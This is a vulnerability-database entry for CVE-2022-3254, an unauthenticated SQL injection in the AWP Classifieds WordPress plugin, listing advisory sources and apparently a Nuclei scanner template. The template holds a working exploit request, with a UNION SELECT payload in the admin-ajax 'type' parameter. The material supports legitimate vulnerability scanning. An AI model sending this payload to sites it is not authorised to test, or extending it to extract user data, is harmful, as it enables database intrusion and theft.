| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2022-3254 | 31 Oct 2022 19:38 | – | circl |
| WordPress plugin WordPress Classifieds Plugin SQL injection vulnerability | 31 Oct 2022 00:00 | – | cnnvd |
| CVE-2022-3254 | 31 Oct 2022 00:00 | – | cve |
| CVE-2022-3254 AWP Classifieds Plugin < 4.3 - Unauthenticated SQLi | 31 Oct 2022 00:00 | – | cvelist |
| CVE-2022-3254 | 31 Oct 2022 16:15 | – | nvd |
| CVE-2022-3254 | 31 Oct 2022 16:15 | – | osv |
| WordPress AWP Classifieds plugin <= 4.2.1 - Unauthenticated SQL Injection (SQLi) vulnerability | 10 Oct 2022 00:00 | – | patchstack |
| Sql injection | 31 Oct 2022 16:15 | – | prion |
| PT-2022-21356 | 31 Oct 2022 00:00 | – | ptsecurity |
| CVE-2022-3254 | 23 May 2025 01:19 | – | redhatcve |
```yaml
id: CVE-2022-3254

info:
  name: AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands. Exploitation requires the premium module to be active.
  remediation: |
    Update to version 4.3 or later.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3254
    - https://wpscan.com/vulnerability/546c47c2-5b4b-46db-b754-c6b43aef2660
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "plugins/another-wordpress-classifieds-plugin/"
  tags: cve,cve2022,sqli,wordpress,wp-plugin,awpcp,unauth,wp,vkev

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=awpcp-get-regions-options&context=search&parent_type=country&parent=test&type=id`+FROM+wp_users+WHERE+1=0+UNION+SELECT+VERSION();--+- HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'startswith(trim(body), "{")' # Ensure response is JSON structure
          - 'contains_all(body, "options", "status")'
          - '!contains(body, "\"options\":false")'
          - '!regex(body, "\"options\"\\s*:\\s*\\[\\s*\\]")'
        condition: and
# digest: 4a0a00473045022039b01f894e5ae7efd5f6585ba5fc791b47f973783458b2bacc15ff811049b57a022100d7522a9a5044adc9476aba52b88680f8f5e19ef31da77826020390ca250bc773:922c64590222798bb761d5b6d8e72950
```